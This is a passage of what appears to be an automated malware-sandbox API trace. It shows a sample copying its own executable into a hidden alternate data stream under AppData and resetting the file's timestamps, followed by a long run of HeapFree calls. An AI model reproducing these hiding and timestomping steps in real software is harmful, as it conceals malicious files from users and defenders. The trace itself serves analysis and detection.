HALPmcxz\\AppData\\Roaming\\Pipe:bin" [0028.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\srevho.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0028.919] GetFileSize (in: hFile=0x9c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf000 [0028.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xf002) returned 0x5baf98 [0028.919] ReadFile (in: hFile=0x9c, lpBuffer=0x5baf98, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x18feb8, lpOverlapped=0x0 | out: lpBuffer=0x5baf98*, lpNumberOfBytesRead=0x18feb8*=0xf000, lpOverlapped=0x0) returned 1 [0028.921] CloseHandle (hObject=0x9c) returned 1 [0028.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0028.922] WriteFile (in: hFile=0x9c, lpBuffer=0x5baf98*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x18fec4, lpOverlapped=0x0 | out: lpBuffer=0x5baf98*, lpNumberOfBytesWritten=0x18fec4*=0xf000, lpOverlapped=0x0) returned 1 [0028.923] SetEndOfFile (hFile=0x9c) returned 1 [0028.923] CloseHandle (hObject=0x9c) returned 1 [0028.925] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5baf98 | out: hHeap=0x5a0000) returned 1 [0028.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0028.925] SetFileTime (hFile=0x9c, lpCreationTime=0x637158, lpLastAccessTime=0x637158, lpLastWriteTime=0x637158) returned 1 [0028.925] CloseHandle (hObject=0x9c) returned 1 [0028.925] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc240 | out: hHeap=0x5a0000) returned 1 [0028.925] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc2e8 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc3a0 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc440 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc4e0 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc580 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc620 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc6d0 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc780 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc828 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc8d0 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc990 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cca38 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ccad8 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ccb80 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ccc20 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cccc0 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ccd68 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cce08 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce150 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce220 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce2e8 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cceb0 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ccf58 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ccff8 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd098 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd138 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd1d8 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd280 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd320 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd3c0 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd490 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd560 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd630 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd708 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd7e8 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd8b8 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd980 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cda48 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cdb10 | out: hHeap=0x5a0000) returned 1 [0028.926] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cdbe0 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cdca8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cdd80 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cde48 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cdf28 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce000 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce3b8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce498 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce568 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce630 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce708 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce7f0 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce8d0 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ce9b0 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cea80 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ceb58 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cec28 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cecf8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cedc8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cee98 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cef70 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf040 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf108 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf1d8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf370 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf440 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf530 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1518 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d15f8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d35e0 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d16c8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1798 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1868 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1938 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d36a8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1a08 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3770 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1ad8 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf608 | out: hHeap=0x5a0000) returned 1 [0028.927] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1ba8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3838 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1c78 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1d48 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3918 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d39f8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cf6e0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3ad8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3b80 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3c20 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3cd0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3d70 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3ec0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3f80 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4028 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d40e0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d60c8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6160 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6208 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d62b8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6360 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d63f8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d64a0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4180 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4220 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d42c0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4360 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4400 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6538 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d65f8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d66a0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6748 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d85e0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d67f0 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8698 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6898 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6940 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d69e8 | out: hHeap=0x5a0000) returned 1 [0028.928] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8758 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8808 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d44a0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4540 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d45e0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6a90 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4680 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6b38 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d88b8 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8970 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6be0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6c88 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4720 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d47c0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6d30 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6dd8 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4860 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6e80 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4900 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8a28 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d49a0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6f28 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6fd0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7078 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7120 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d71c8 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7270 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7318 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d73c0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7468 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4a40 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4ae0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4b80 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7510 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d75b8 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4c20 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8ae0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8b98 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4cc0 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4d60 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4e00 | out: hHeap=0x5a0000) returned 1 [0028.929] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4ea0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8c50 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4f40 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4fe0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7660 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7708 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8d00 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5080 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5120 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8d98 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d51c0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d77b0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8e50 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8f00 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5260 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7858 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5300 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7900 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d53a0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d79a8 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7a50 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5440 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d54e0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5580 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5620 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d56c0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5760 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8fb0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9068 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5800 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9100 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d58a0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7af8 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5940 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7ba0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7c48 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d59e0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5a80 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5b20 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: 